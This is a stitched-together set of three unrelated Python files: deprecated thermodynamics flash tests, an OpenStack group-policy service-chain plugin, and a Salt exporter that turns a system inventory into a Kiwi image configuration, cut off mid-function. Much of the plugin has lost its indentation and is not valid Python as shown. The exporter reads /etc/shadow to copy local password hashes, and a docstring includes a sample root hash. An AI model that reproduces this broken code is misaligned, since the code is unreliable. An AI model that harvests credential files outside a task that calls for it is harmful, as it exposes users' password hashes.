    pkg = IdealCaloric(VaporPressures=mix.VaporPressures, Tms=mix.Tms, Tbs=mix.Tbs, Tcs=mix.Tcs, Pcs=mix.Pcs,
                       HeatCapacityLiquids=mix.HeatCapacityLiquids, HeatCapacityGases=mix.HeatCapacityGases,
                       EnthalpyVaporizations=mix.EnthalpyVaporizations, VolumeLiquids=mix.VolumeLiquids)
    for P in [1E3, 1E4, 1E5, 1E6]:
        for T in np.linspace(300, 600, 10):
            T = float(T)
            pkg.flash(T=T, P=P, zs=mix.zs)
            pkg._post_flash()
            solved = pkg.flash_PH_zs_bounded(P=P, Hm=pkg.Hm, zs=mix.zs)
            assert_allclose(solved['T'], T, rtol=1E-3)
@pytest.mark.deprecated
def test_IdealCaloric_PS():
    """P-S flash must invert a T-P flash: solving for T at the entropy of
    a known (T, P) state recovers that temperature."""
    mix = Mixture(['pentane', 'hexane', 'octane'], zs=[.1, .4, .5], T=298.15)
    pkg = IdealCaloric(VaporPressures=mix.VaporPressures, Tms=mix.Tms, Tbs=mix.Tbs, Tcs=mix.Tcs, Pcs=mix.Pcs,
                       HeatCapacityLiquids=mix.HeatCapacityLiquids, HeatCapacityGases=mix.HeatCapacityGases,
                       EnthalpyVaporizations=mix.EnthalpyVaporizations, VolumeLiquids=mix.VolumeLiquids)
    for P in [1E3, 1E4, 1E5, 1E6]:
        for T in np.linspace(300, 600, 10):
            T = float(T)
            pkg.flash(T=T, P=P, zs=mix.zs)
            pkg._post_flash()
            solved = pkg.flash_PS_zs_bounded(P=P, Sm=pkg.Sm, zs=mix.zs)
            assert_allclose(solved['T'], T, rtol=1E-3)
@pytest.mark.deprecated
def test_IdealCaloric_TS():
    """T-S flash must invert a T-VF flash: solving for P at the entropy of
    a known (T, VF) state recovers the equilibrium pressure."""
    mix = Mixture(['pentane', 'hexane', 'octane'], zs=[.1, .4, .5], T=298.15)
    pkg = IdealCaloric(VaporPressures=mix.VaporPressures, Tms=mix.Tms, Tbs=mix.Tbs, Tcs=mix.Tcs, Pcs=mix.Pcs,
                       HeatCapacityLiquids=mix.HeatCapacityLiquids, HeatCapacityGases=mix.HeatCapacityGases,
                       EnthalpyVaporizations=mix.EnthalpyVaporizations, VolumeLiquids=mix.VolumeLiquids)
    for T in np.linspace(300, 400, 10):
        for vf in [1E-5, .1, .5, .99, 1]:
            T = float(T)
            pkg.flash(T=T, VF=vf, zs=mix.zs)
            pkg._post_flash()
            P_known = pkg.P
            solved = pkg.flash_TS_zs_bounded(T=T, Sm=pkg.Sm, zs=mix.zs)
            assert_allclose(solved['P'], P_known, rtol=1E-3)
@pytest.mark.deprecated
def test_GammaPhiBasic():
    """The base GammaPhi package assumes unit activity coefficients, so
    every excess property (GE, HE, SE) must be exactly zero."""
    mix = Mixture(['hexane', '2-Butanone'], zs=[.5, .5], T=273.15 + 60)
    pkg = GammaPhi(VaporPressures=mix.VaporPressures, Tms=mix.Tms, Tcs=mix.Tcs, Pcs=mix.Pcs)
    xs = [.5, .5]
    for excess_property in (pkg.GE_l, pkg.HE_l, pkg.SE_l):
        assert_allclose(excess_property(400., xs), 0)
@pytest.mark.deprecated
def test_PartialPropertyIdeal():
    """Spot-check partial molar enthalpies computed by the ideal caloric
    package at infinite dilution and at equimolar composition."""
    mix = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=5000, T=298.15)
    pkg = IdealCaloric(VaporPressures=mix.VaporPressures, Tms=mix.Tms, Tbs=mix.Tbs, Tcs=mix.Tcs, Pcs=mix.Pcs,
                       HeatCapacityLiquids=mix.HeatCapacityLiquids, HeatCapacityGases=mix.HeatCapacityGases,
                       EnthalpyVaporizations=mix.EnthalpyVaporizations, VolumeLiquids=mix.VolumeLiquids)
    cases = [
        # (component index, composition, expected partial molar Hm)
        (0, [0, 1], -42413.680464960635),
        (1, [0, 1], -43987.417546304641),
        (1, [.5, .5], -118882.74138254928),
    ]
    for i, zs, expect in cases:
        calc = pkg.partial_property(T=mix.T, P=mix.P, i=i, zs=zs, prop='Hm')
        assert_allclose(calc, expect, rtol=2e-3)
@pytest.mark.deprecated
def test_GammaPhiCaloricBasic():
    """GammaPhiCaloric sanity checks: a ternary T-VF flash with fugacity
    and Poynting corrections enabled, then single-component T-VF and
    P-VF flashes which must land exactly on the saturation curve."""
    m = Mixture(['pentane', 'hexane', 'octane'], zs=[.1, .4, .5], T=298.15)
    pkg = GammaPhiCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
                          HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
                          EnthalpyVaporizations=m.EnthalpyVaporizations, omegas=m.omegas,
                          VolumeLiquids=m.VolumeLiquids, eos=PR, eos_mix=PRMIX)
    pkg.use_phis, pkg.use_Poynting = True, True
    pkg.flash(zs=m.zs, T=400, VF=0.5)
    assert_allclose(pkg.P, 233084.1813331093, rtol=2e-3)
    # 1 component still needs to be able to flash
    m = Mixture(['R-134a'], zs=[1], T=300, P=1E5)
    m.set_property_package(GammaPhiCaloric )
    # TVF flashes
    m.property_package.flash_caloric(T=300, VF=1, zs=[1])
    assert_allclose(m.property_package.P, m.Psats[0])
    P_300 = m.property_package.P
    m.property_package.flash_caloric(T=300, VF=0, zs=[1])
    assert_allclose(m.property_package.P, m.Psats[0])
    m.property_package.flash_caloric(T=300, VF=0.5, zs=[1])
    assert_allclose(m.property_package.P, m.Psats[0])
    # PVF flashes
    m.property_package.flash_caloric(P=P_300, VF=1, zs=[1])
    assert_allclose(m.property_package.T, 300.)
    m.property_package.flash_caloric(P=P_300, VF=0, zs=[1])
    assert_allclose(m.property_package.T, 300.)
    m.property_package.flash_caloric(P=P_300, VF=0.5, zs=[1])
    assert_allclose(m.property_package.T, 300.)
@pytest.mark.deprecated
def test_UnifacCaloric():
    """UNIFAC caloric package: smoke-test the excess-property calls after
    a ternary alkane flash, then check GE/HE against a DDBST reference
    problem and verify CpE_l numerically as d(HE_l)/dT."""
    m = Mixture(['pentane', 'hexane', 'octane'], zs=[.1, .4, .5], T=298.15)
    pkg = UnifacCaloric(UNIFAC_groups=m.UNIFAC_groups, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
                        HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
                        EnthalpyVaporizations=m.EnthalpyVaporizations, omegas=m.omegas,
                        VolumeLiquids=m.VolumeLiquids, eos=PR, eos_mix=PRMIX)
    pkg.use_phis, pkg.use_Poynting = True, True
    pkg.flash(zs=m.zs, T=400, P=1E7) # 658E6 659E6
    # Smoke only - exercise the attributes/methods, no value assertions
    pkg.P
    pkg.phase
    pkg.GE_l(pkg.T, pkg.xs)
    pkg.HE_l(pkg.T, pkg.xs)
    pkg.CpE_l(pkg.T, pkg.xs)
    pkg.GE_l(pkg.T, pkg.xs)
    pkg.SE_l(pkg.T, pkg.xs)
    # DDBST test question
    m = Mixture(['hexane', '2-Butanone'], zs=[.5, .5], T=273.15 + 60)
    pkg = UnifacCaloric(UNIFAC_groups=m.UNIFAC_groups, VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
                        HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
                        EnthalpyVaporizations=m.EnthalpyVaporizations, omegas=m.omegas,
                        VolumeLiquids=m.VolumeLiquids, eos=PR, eos_mix=PRMIX)
    pkg.use_phis, pkg.use_Poynting = False, False
    pkg.flash(zs=m.zs, T=273.15 + 60, P=3E5)
    GE = pkg.GE_l(pkg.T, pkg.xs)
    assert_allclose(GE, 923.6408846044955, rtol=1E-3)
    HE = pkg.HE_l(pkg.T, pkg.xs)
    assert_allclose(HE, 854.77487867139587, rtol=1E-3)
    # Numeric CpE_l test
    deltaH = pkg.HE_l(pkg.T+0.01, pkg.xs) - pkg.HE_l(pkg.T, pkg.xs)
    assert_allclose(deltaH, pkg.CpE_l(pkg.T, pkg.xs)*0.01, rtol=1E-4)
@pytest.mark.deprecated
def test_UnifacDortmundCaloric():
    """Smoke test: a T-VF flash with the Dortmund-modified UNIFAC caloric
    package completes without raising."""
    mix = Mixture(['hexane', '2-Butanone'], zs=[.5, .5], T=273.15 + 60)
    pkg = UnifacDortmundCaloric(UNIFAC_groups=mix.UNIFAC_Dortmund_groups,
                                VaporPressures=mix.VaporPressures,
                                Tms=mix.Tms, Tbs=mix.Tbs, Tcs=mix.Tcs, Pcs=mix.Pcs,
                                HeatCapacityLiquids=mix.HeatCapacityLiquids,
                                HeatCapacityGases=mix.HeatCapacityGases,
                                EnthalpyVaporizations=mix.EnthalpyVaporizations,
                                omegas=mix.omegas, VolumeLiquids=mix.VolumeLiquids,
                                eos=PR, eos_mix=PRMIX)
    pkg.flash(VF=0.5, T=350, zs=mix.zs)
@pytest.mark.deprecated
def test_Act_infinite():
    """Infinite-dilution activity coefficients for the ethanol/water pair
    from the Dortmund-modified UNIFAC caloric package."""
    mix = Mixture(['ethanol', 'water'], zs=[.5, .5], T=273.15 + 60)
    pkg = UnifacDortmundCaloric(UNIFAC_groups=mix.UNIFAC_Dortmund_groups,
                                VaporPressures=mix.VaporPressures,
                                Tms=mix.Tms, Tbs=mix.Tbs, Tcs=mix.Tcs, Pcs=mix.Pcs,
                                HeatCapacityLiquids=mix.HeatCapacityLiquids,
                                HeatCapacityGases=mix.HeatCapacityGases,
                                EnthalpyVaporizations=mix.EnthalpyVaporizations,
                                omegas=mix.omegas, VolumeLiquids=mix.VolumeLiquids,
                                eos=PR, eos_mix=PRMIX)
    # Water infinitely dilute in ethanol (3.28 in ddbst free data)
    assert_allclose(pkg.gammas_infinite_dilution(298.15)[1], 2.611252717452456)
    # Ethanol infinitely dilute in water (3.1800 with OTHR method or 4.3800 with another method)
    assert_allclose(pkg.gammas_infinite_dilution(283.15)[0], 4.401784691406401)
@pytest.mark.deprecated
def test_WilsonPP():
    """Wilson property package: build a 7-component alcohol/water system
    with full six-term temperature-dependent lambda coefficients (the A,
    C, D, E, F tables carry small noise around the dominant B/T terms)
    and pin the activity coefficients at the feed composition."""
    m = Mixture(['water', 'ethanol', 'methanol', '1-pentanol', '2-pentanol', '3-pentanol',
                 '1-decanol'],
                P=1e5, zs=[1/7.0]*7, T=273.15+70)
    # Main coefficients with temperature inverse dependency
    lambdasB = [[0.0, -35.3, 40.0, -139.0, -129.0, -128.0, -242.0],
                [-557.0, 0.0, -200.0, 83.2, 84.6, 80.2, 140.0],
                [-280.0, 95.5, 0.0, 88.2, 85.3, 89.1, 119.0],
                [-1260.0, -128.0, -220.0, 0.0, -94.4, -85.5, 59.7],
                [-1280.0, -121.0, -236.0, 80.3, 0.0, -88.8, 61.4],
                [-1370.0, -121.0, -238.0, 75.7, 78.2, 0.0, 63.1],
                [-2670.0, -304.0, -403.0, -93.4, -91.1, -86.6, 0.0]]
    # Add in some random noise for numerical stuff
    lambdasA = [[0.0092, 0.00976, 0.00915, 0.00918, 0.00974, 0.00925, 0.00908],
                [0.00954, 0.00927, 0.00902, 0.00948, 0.00934, 0.009, 0.00995],
                [0.00955, 0.00921, 0.0098, 0.00926, 0.00952, 0.00912, 0.00995],
                [0.00924, 0.00938, 0.00941, 0.00992, 0.00935, 0.00996, 0.0092],
                [0.00992, 0.00946, 0.00935, 0.00917, 0.00998, 0.00903, 0.00924],
                [0.00937, 0.00973, 0.00924, 0.00991, 0.00997, 0.00968, 0.00975],
                [0.00983, 0.00934, 0.00921, 0.00977, 0.00944, 0.00902, 0.00916]]
    lambdasC = [[0.000956, 0.000958, 0.000993, 0.000949, 0.000913, 0.000947, 0.000949],
                [0.000945, 0.000928, 0.000935, 0.000999, 0.000986, 0.000959, 0.000924],
                [0.000957, 0.000935, 0.00097, 0.000906, 0.00098, 0.000952, 0.000939],
                [0.000956, 0.000948, 0.0009, 0.000903, 0.000967, 0.000972, 0.000969],
                [0.000917, 0.000949, 0.000973, 0.000922, 0.000978, 0.000944, 0.000905],
                [0.000947, 0.000996, 0.000961, 0.00091, 0.00096, 0.000982, 0.000998],
                [0.000934, 0.000929, 0.000955, 0.000975, 0.000924, 0.000979, 0.001]]
    lambdasD = [[3.78e-05, 3.86e-05, 3.62e-05, 3.83e-05, 3.95e-05, 3.94e-05, 3.92e-05],
                [3.88e-05, 3.88e-05, 3.75e-05, 3.82e-05, 3.8e-05, 3.76e-05, 3.71e-05],
                [3.93e-05, 3.67e-05, 4e-05, 4e-05, 3.67e-05, 3.72e-05, 3.82e-05],
                [3.95e-05, 3.67e-05, 3.64e-05, 3.62e-05, 3.62e-05, 3.63e-05, 3.97e-05],
                [3.83e-05, 3.68e-05, 3.73e-05, 3.78e-05, 3.9e-05, 3.79e-05, 3.94e-05],
                [3.67e-05, 3.82e-05, 3.76e-05, 3.61e-05, 3.67e-05, 3.88e-05, 3.64e-05],
                [3.7e-05, 3.7e-05, 3.82e-05, 3.91e-05, 3.73e-05, 3.93e-05, 3.89e-05]]
    lambdasE = [[493.0, 474.0, 481.0, 468.0, 467.0, 474.0, 460.0],
                [478.0, 454.0, 460.0, 488.0, 469.0, 479.0, 483.0],
                [469.0, 493.0, 470.0, 476.0, 466.0, 451.0, 478.0],
                [481.0, 470.0, 467.0, 455.0, 473.0, 465.0, 465.0],
                [470.0, 487.0, 472.0, 460.0, 467.0, 468.0, 500.0],
                [480.0, 464.0, 475.0, 469.0, 462.0, 476.0, 469.0],
                [492.0, 460.0, 458.0, 494.0, 465.0, 461.0, 496.0]]
    lambdasF = [[8.25e-08, 8.27e-08, 8.78e-08, 8.41e-08, 8.4e-08, 8.93e-08, 8.98e-08],
                [8.28e-08, 8.35e-08, 8.7e-08, 8.96e-08, 8.15e-08, 8.46e-08, 8.53e-08],
                [8.51e-08, 8.65e-08, 8.24e-08, 8.89e-08, 8.86e-08, 8.71e-08, 8.21e-08],
                [8.75e-08, 8.89e-08, 8.6e-08, 8.42e-08, 8.83e-08, 8.52e-08, 8.53e-08],
                [8.24e-08, 8.27e-08, 8.43e-08, 8.19e-08, 8.74e-08, 8.3e-08, 8.35e-08],
                [8.79e-08, 8.84e-08, 8.31e-08, 8.15e-08, 8.68e-08, 8.55e-08, 8.2e-08],
                [8.63e-08, 8.76e-08, 8.52e-08, 8.46e-08, 8.67e-08, 8.9e-08, 8.38e-08]]
    # lambdasF = [[float('%.3g'%(9e-8*(1-random()/10))) for li in l] for l in lambdas]
    # Zip the six per-coefficient tables into one (i, j) -> [A..F] structure
    lambdas = [[[lambdasA[i][j], lambdasB[i][j], lambdasC[i][j], lambdasD[i][j], lambdasE[i][j], lambdasF[i][j]]
                for i in range(7)] for j in range(7)]
    pp = WilsonPP(lambda_coeffs=lambdas, VaporPressures=m.VaporPressures, Tms=m.Tms,
                  Tcs=m.Tcs, Pcs=m.Pcs, omegas=m.omegas, VolumeLiquids=m.VolumeLiquids,
                  HeatCapacityGases=m.HeatCapacityGases, HeatCapacityLiquids=m.HeatCapacityLiquids,
                  EnthalpyVaporizations=m.EnthalpyVaporizations,
                  )
    pp.use_Poynting = False
    pp.use_phis = False
    # %timeit pp.flash(T=m.T, VF=0.5, zs=m.zs)
    # %timeit pp.flash(T=m.T, P=1e5, zs=m.zs)
    gammas_expect = [2.784908901542442, 1.0130668698335248, 0.9568045340893059, 1.136705813243453, 1.1367663802068781, 1.1379884837750023, 1.2584293455795716]
    gammas_calc = pp.gammas(m.T, m.zs)
    assert_allclose(gammas_expect, gammas_calc)
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.common import log
from neutron.openstack.common import excutils
from neutron.openstack.common import log as logging
import gbpservice.neutron.db.servicechain_db as servicechain_db
from gbpservice.neutron.services.servicechain.plugins.msc import (
context as servicechain_context)
from gbpservice.neutron.services.servicechain.plugins.msc import (
driver_manager as manager)
from gbpservice.neutron.services.servicechain.plugins import sharing
LOG = logging.getLogger(__name__)
class ServiceChainPlugin(servicechain_db.ServiceChainDbPlugin,
sharing.SharingMixin):
"""Implementation of the Service Chain Plugin.
"""
supported_extension_aliases = ["servicechain"]
    def __init__(self):
        """Build the driver manager, initialize the DB plugin base, then
        initialize the registered service chain drivers (in that order -
        drivers are initialized only after the DB layer is ready)."""
        self.driver_manager = manager.DriverManager()
        super(ServiceChainPlugin, self).__init__()
        self.driver_manager.initialize()
@log.log
def create_servicechain_node(self, context, servicechain_node):
session = context.session
with session.begin(subtransactions=True):
result = super(ServiceChainPlugin, self).create_servicechain_node(
context, servicechain_node)
self._validate_shared_create(context, result, 'servicechain_node')
sc_context = servicechain_context.ServiceChainNodeContext(
self, context, result)
self.driver_manager.create_servicechain_node_precommit(
sc_context)
try:
self.driver_manager.create_servicechain_node_postcommit(
sc_context)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_("driver_manager.create_servicechain_postcommit "
"failed, deleting servicechain_node %s"),
result['id'])
self.delete_servicechain_node(context, result['id'])
return result
    @log.log
    def update_servicechain_node(self, context, servicechain_node_id,
                                 servicechain_node):
        """Update a service chain node and notify the drivers.

        The DB update, sharing validation and the precommit hook run in
        one subtransaction; the postcommit hook runs after it and any
        exception it raises propagates to the caller (no rollback of the
        already-committed update is attempted).
        """
        session = context.session
        with session.begin(subtransactions=True):
            original_sc_node = self.get_servicechain_node(
                context, servicechain_node_id)
            updated_sc_node = super(ServiceChainPlugin,
                                    self).update_servicechain_node(
                                        context, servicechain_node_id,
                                        servicechain_node,
                                        set_params=True)
            self._validate_shared_update(context, original_sc_node,
                                         updated_sc_node, 'servicechain_node')
            sc_context = servicechain_context.ServiceChainNodeContext(
                self, context, updated_sc_node,
                original_sc_node=original_sc_node)
            self.driver_manager.update_servicechain_node_precommit(
                sc_context)
        self.driver_manager.update_servicechain_node_postcommit(sc_context)
        return updated_sc_node
    @log.log
    def delete_servicechain_node(self, context, servicechain_node_id):
        """Delete a service chain node and notify the drivers.

        Fetch, precommit hook and DB delete run in one subtransaction.
        The postcommit hook runs afterwards; its failures are logged and
        deliberately swallowed, since the row is already gone.
        """
        session = context.session
        with session.begin(subtransactions=True):
            sc_node = self.get_servicechain_node(context,
                                                 servicechain_node_id)
            sc_context = servicechain_context.ServiceChainNodeContext(
                self, context, sc_node)
            self.driver_manager.delete_servicechain_node_precommit(
                sc_context)
            super(ServiceChainPlugin, self).delete_servicechain_node(
                context, servicechain_node_id)
        try:
            self.driver_manager.delete_servicechain_node_postcommit(
                sc_context)
        except Exception:
            LOG.exception(_("delete_servicechain_node_postcommit failed "
                            "for servicechain_node %s"),
                          servicechain_node_id)
@log.log
def create_servicechain_spec(self, context, servicechain_spec):
session = context.session
with session.begin(subtransactions=True):
result = super(ServiceChainPlugin, self).create_servicechain_spec(
context, servicechain_spec)
self._validate_shared_create(context, result, 'servicechain_spec')
sc_context = servicechain_context.ServiceChainSpecContext(
self, context, result)
self.driver_manager.create_servicechain_spec_precommit(
sc_context)
try:
self.driver_manager.create_servicechain_spec_postcommit(sc_context)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_("driver_manager.create_servicechain_postcommit "
"failed, deleting servicechain_spec %s"),
result['id'])
self.delete_servicechain_spec(context, result['id'])
return result
    @log.log
    def update_servicechain_spec(self, context, servicechain_spec_id,
                                 servicechain_spec):
        """Update a service chain spec and notify the drivers.

        The DB update, sharing validation and the precommit hook run in
        one subtransaction; the postcommit hook runs after it and any
        exception it raises propagates to the caller.
        """
        session = context.session
        with session.begin(subtransactions=True):
            original_sc_spec = self.get_servicechain_spec(
                context, servicechain_spec_id)
            updated_sc_spec = super(ServiceChainPlugin,
                                    self).update_servicechain_spec(
                                        context, servicechain_spec_id,
                                        servicechain_spec)
            self._validate_shared_update(context, original_sc_spec,
                                         updated_sc_spec, 'servicechain_spec')
            sc_context = servicechain_context.ServiceChainSpecContext(
                self, context, updated_sc_spec,
                original_sc_spec=original_sc_spec)
            self.driver_manager.update_servicechain_spec_precommit(
                sc_context)
        self.driver_manager.update_servicechain_spec_postcommit(sc_context)
        return updated_sc_spec
    @log.log
    def delete_servicechain_spec(self, context, servicechain_spec_id):
        """Delete a service chain spec and notify the drivers.

        Fetch, precommit hook and DB delete run in one subtransaction.
        The postcommit hook runs afterwards; its failures are logged and
        deliberately swallowed, since the row is already gone.
        """
        session = context.session
        with session.begin(subtransactions=True):
            sc_spec = self.get_servicechain_spec(context,
                                                 servicechain_spec_id)
            sc_context = servicechain_context.ServiceChainSpecContext(
                self, context, sc_spec)
            self.driver_manager.delete_servicechain_spec_precommit(
                sc_context)
            super(ServiceChainPlugin, self).delete_servicechain_spec(
                context, servicechain_spec_id)
        try:
            self.driver_manager.delete_servicechain_spec_postcommit(sc_context)
        except Exception:
            LOG.exception(_("delete_servicechain_spec_postcommit failed "
                            "for servicechain_spec %s"),
                          servicechain_spec_id)
    @log.log
    def create_servicechain_instance(self, context, servicechain_instance):
        """Create a service chain instance and notify the drivers.

        Unlike node/spec/profile creation there is no sharing validation
        here.  DB create and precommit run in one subtransaction; if the
        postcommit hook raises, the instance is deleted again and the
        original exception re-raised.
        """
        session = context.session
        with session.begin(subtransactions=True):
            result = super(ServiceChainPlugin,
                           self).create_servicechain_instance(
                               context, servicechain_instance)
            sc_context = servicechain_context.ServiceChainInstanceContext(
                self, context, result)
            self.driver_manager.create_servicechain_instance_precommit(
                sc_context)
        try:
            self.driver_manager.create_servicechain_instance_postcommit(
                sc_context)
        except Exception:
            with excutils.save_and_reraise_exception():
                LOG.error(_(
                    "driver_manager.create_servicechain_instance_postcommit "
                    "failed, deleting servicechain_instance %s"),
                    result['id'])
                self.delete_servicechain_instance(context, result['id'])
        return result
    @log.log
    def update_servicechain_instance(self, context,
                                     servicechain_instance_id,
                                     servicechain_instance):
        """Update a service chain instance and notify the drivers.

        DB update and precommit run in one subtransaction; the postcommit
        hook runs after it and any exception it raises propagates to the
        caller.  No sharing validation is performed for instances.
        """
        session = context.session
        with session.begin(subtransactions=True):
            original_sc_instance = self.get_servicechain_instance(
                context, servicechain_instance_id)
            updated_sc_instance = super(ServiceChainPlugin,
                                        self).update_servicechain_instance(
                                            context, servicechain_instance_id,
                                            servicechain_instance)
            sc_context = servicechain_context.ServiceChainInstanceContext(
                self, context, updated_sc_instance,
                original_sc_instance=original_sc_instance)
            self.driver_manager.update_servicechain_instance_precommit(
                sc_context)
        self.driver_manager.update_servicechain_instance_postcommit(
            sc_context)
        return updated_sc_instance
    @log.log
    def delete_servicechain_instance(self, context, servicechain_instance_id):
        """Delete a servicechain instance.

        DB delete and driver precommit share one transaction.  A failing
        postcommit hook is only logged (not re-raised) because the DB
        record is already gone at that point.
        """
        session = context.session
        with session.begin(subtransactions=True):
            sc_instance = self.get_servicechain_instance(
                context,
                servicechain_instance_id)
            sc_context = servicechain_context.ServiceChainInstanceContext(
                self, context, sc_instance)
            self.driver_manager.delete_servicechain_instance_precommit(
                sc_context)
            super(ServiceChainPlugin, self).delete_servicechain_instance(
                context, servicechain_instance_id)

        try:
            self.driver_manager.delete_servicechain_instance_postcommit(
                sc_context)
        except Exception:
            LOG.exception(_("delete_servicechain_instance_postcommit failed "
                            "for servicechain_instance %s"),
                          servicechain_instance_id)
    @log.log
    def create_service_profile(self, context, service_profile):
        """Create a service profile.

        DB create, shared-attribute validation and driver precommit run
        in one transaction; postcommit runs after commit and, if it
        fails, the new profile is deleted again before re-raising.
        """
        session = context.session
        with session.begin(subtransactions=True):
            result = super(ServiceChainPlugin,
                           self).create_service_profile(
                               context, service_profile)
            self._validate_shared_create(context, result, 'service_profile')
            sc_context = servicechain_context.ServiceProfileContext(
                self, context, result)
            self.driver_manager.create_service_profile_precommit(
                sc_context)

        try:
            self.driver_manager.create_service_profile_postcommit(
                sc_context)
        except Exception:
            # Best-effort rollback; original exception is re-raised.
            with excutils.save_and_reraise_exception():
                LOG.error(_(
                    "driver_manager.create_service_profile_postcommit "
                    "failed, deleting service_profile %s"),
                    result['id'])
                self.delete_service_profile(context, result['id'])

        return result
    @log.log
    def update_service_profile(self, context, service_profile_id,
                               service_profile):
        """Update a service profile.

        DB update, shared-attribute validation and driver precommit run
        in one transaction; postcommit runs after the commit (a failure
        there propagates to the caller).
        """
        session = context.session
        with session.begin(subtransactions=True):
            # Pre-update snapshot so drivers can compare old vs new.
            original_profile = self.get_service_profile(
                context, service_profile_id)
            updated_profile = super(ServiceChainPlugin,
                                    self).update_service_profile(
                                        context, service_profile_id, service_profile)
            self._validate_shared_update(context, original_profile,
                                         updated_profile, 'service_profile')
            sc_context = servicechain_context.ServiceProfileContext(
                self, context, updated_profile,
                original_profile=original_profile)
            self.driver_manager.update_service_profile_precommit(
                sc_context)

        self.driver_manager.update_service_profile_postcommit(
            sc_context)

        return updated_profile
    @log.log
    def delete_service_profile(self, context, service_profile_id):
        """Delete a service profile.

        DB delete and driver precommit share one transaction.  A failing
        postcommit hook is only logged, since the DB record is already
        removed at that point.
        """
        session = context.session
        with session.begin(subtransactions=True):
            profile = self.get_service_profile(
                context, service_profile_id)
            sc_context = servicechain_context.ServiceProfileContext(
                self, context, profile)
            self.driver_manager.delete_service_profile_precommit(
                sc_context)
            super(ServiceChainPlugin, self).delete_service_profile(
                context, service_profile_id)

        try:
            self.driver_manager.delete_service_profile_postcommit(
                sc_context)
        except Exception:
            LOG.exception(_("delete_service_profile_postcommit failed "
                            "for service_profile %s"),
                          service_profile_id)
| |
# -*- coding: utf-8 -*-
#
# Copyright 2016 SUSE LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Import python libs
from __future__ import absolute_import
import os
import grp
import pwd
from xml.dom import minidom
import platform
import socket
# Import salt libs
from salt.modules.inspectlib.exceptions import InspectorKiwiProcessorException
# Import third party libs
try:
from lxml import etree
except ImportError:
from salt._compat import ElementTree as etree
class KiwiExporter(object):
    '''
    Exports system description as Kiwi configuration.
    '''

    def __init__(self, grains, format):
        self.__grains__ = grains
        self.format = format
        # Anonymous attribute holder; load() attaches description data here.
        self._data = type('data', (), {})
        self.name = None

    def load(self, **descr):
        '''
        Load data by keys.

        :param descr: each keyword's value is attached to the internal
            data holder under the keyword's name.
        :return: self (chainable)
        '''
        for obj, data in descr.items():
            setattr(self._data, obj, data)

        return self

    def export(self, name):
        '''
        Export to the Kiwi config.xml as text.

        :param name: image name written to the root <image> element.
        :return: pretty-printed XML text with blank lines removed.
        '''
        self.name = name
        root = self._create_doc()
        self._set_description(root)
        self._set_preferences(root)
        self._set_repositories(root)
        self._set_users(root)
        self._set_packages(root)

        return '\n'.join([line for line in minidom.parseString(
            etree.tostring(root, encoding='UTF-8', pretty_print=True)).toprettyxml(indent=" ").split("\n")
                          if line.strip()])

    def _get_package_manager(self):
        '''
        Get the package manager for the current platform.

        :raises InspectorKiwiProcessorException: if the os_family grain
            is not one of the supported platforms.
        :return: package manager command name
        '''
        ret = None
        os_family = self.__grains__.get('os_family') or ''
        if os_family in ('Kali', 'Debian'):
            ret = 'apt-get'
        elif os_family == 'Suse':
            ret = 'zypper'
        elif os_family.lower() == 'redhat':
            # Salt reports this grain as 'RedHat'; the previous exact
            # comparison against 'redhat' could never match, so accept
            # any casing here.
            ret = 'yum'
        if ret is None:
            raise InspectorKiwiProcessorException(
                'Unsupported platform: {0}'.format(self.__grains__.get('os_family')))

        return ret

    def _set_preferences(self, node):
        '''
        Set preferences.

        :param node: parent XML node
        :return: the created <preferences> element
        '''
        pref = etree.SubElement(node, 'preferences')
        pacman = etree.SubElement(pref, 'packagemanager')
        pacman.text = self._get_package_manager()
        p_version = etree.SubElement(pref, 'version')
        p_version.text = '0.0.1'
        p_type = etree.SubElement(pref, 'type')
        p_type.set('image', 'vmx')

        # Take the filesystem type of the first physical disk, if any.
        for disk_id, disk_data in self._data.system.get('disks', {}).items():
            if disk_id.startswith('/dev'):
                p_type.set('filesystem', disk_data.get('type') or 'ext3')
                break

        p_type.set('installiso', 'true')
        p_type.set('boot', "vmxboot/suse-leap42.1")
        p_type.set('format', self.format)
        p_type.set('bootloader', 'grub2')
        p_type.set('timezone', __salt__['timezone.get_zone']())
        p_type.set('hwclock', __salt__['timezone.get_hwclock']())

        return pref

    def _get_user_groups(self, user):
        '''
        Get all group names a user belongs to (supplementary + primary).

        :param user: login name
        :return: list of group names
        '''
        return [g.gr_name for g in grp.getgrall()
                if user in g.gr_mem] + [grp.getgrgid(pwd.getpwnam(user).pw_gid).gr_name]

    def _set_users(self, node):
        '''
        Create existing local users.

        <users group="root">
          <user password="$1$wYJUgpM5$RXMMeASDc035eX.NbYWFl0" home="/root" name="root"/>
        </users>

        :param node: parent XML node
        :return: the created <users> element
        '''
        # Collect local users with real password hashes; accounts whose
        # hash starts with '!' or '*' are locked/disabled and skipped.
        # Files are read through context managers so the handles are
        # closed deterministically (previously they leaked).
        shadow = {}
        with open('/etc/shadow') as shadow_file:
            for sh_line in shadow_file.read().split(os.linesep):
                if sh_line.strip():
                    # 'passwd' (not 'pwd') so the pwd module isn't shadowed.
